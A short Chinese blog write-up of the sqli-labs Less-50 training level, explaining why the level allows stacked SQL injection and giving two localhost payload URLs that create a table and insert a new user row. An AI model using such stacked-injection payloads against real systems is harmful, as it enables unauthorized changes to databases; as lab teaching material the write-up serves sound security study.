sqli-labs (less-50)

其他 2021-03-22 08:47:15 阅读次数: 0

sqli-labs (less-50)

进入50关，输入sort=1

http://127.0.0.1/sql1/Less-50/?sort=1'

根据错误信息判断为数字型注入，这里发现这不跟前面有一关一模一样，但是我们通过源代码可知，在本关中使用了mysgli multi guery()函数，而在less46-49关中使用了mysqL fetch_assoc()函数，所以这里的不同点就在于本关可以使用堆叠注入的形式

报错注入攻击和时间盲注的攻击在这里我就不详细介绍了，具体过程请看我的less-46，这里我们讲解使用堆叠注入攻击

创建一个表

http://127.0.0.1/sql1/Less-50/?sort=1;create table test like users;--+

创建一个新用户

http://127.0.0.1/sql1/Less-50/?sort=1;insert into users values(18,'icepeak','icepeak');--+

猜你喜欢

转载自blog.csdn.net/kukudeshuo/article/details/114807810

sqli-labs (less-50)

Sqli-labs Less-50 order by后的堆叠注入

sqli-labs ————less -10

sqli-labs ————less -16

sqli-labs ————less -7

sqli-labs ————less -9

sqli-labs ————less -8

Sqli-labs less 10

Sqli-labs less 9

Sqli-labs less 8

Sqli-labs less 7

Sqli-labs less 6

Sqli-labs less 5

#sqli-labs less 11

sqli-labs less -7

sqli-labs less 17

sqli-labs less 16

sqli-labs less 15

sqli-labs less 14

sqli-labs less 13

sqli-labs less 12

sqli-labs less 11

sqli-labs less 3

sqli-labs less 2

sqli-labs Less50-less53

sqli-labs————less6

sqli-labs—————Less-4

sqli-labs—————Less-3

sqli-labs ————less -11（POST注入）

sqli-Labs————less-35

今日推荐

周排行

Leetcode简单题61~80

解决zookeeper磁盘IO高的问题

多线程相关方法详解

Maven-setting.xml文件详解

Maven 项目的 classpath 理解

渊亭科技大数据笔试题

配置JVM内存分配

计算机网络个人学习笔记（三）网络层：第三部分连载

js中两个等号(==)和三个等号(===)的区别

用C程序自动打开电脑上的程序

每日归档

更多

2024-09-18(0)

2024-09-17(0)

2024-09-16(0)

2024-09-15(0)

2024-09-14(0)

2024-09-13(0)

2024-09-12(0)

2024-09-11(0)

2024-09-10(0)

2024-09-09(0)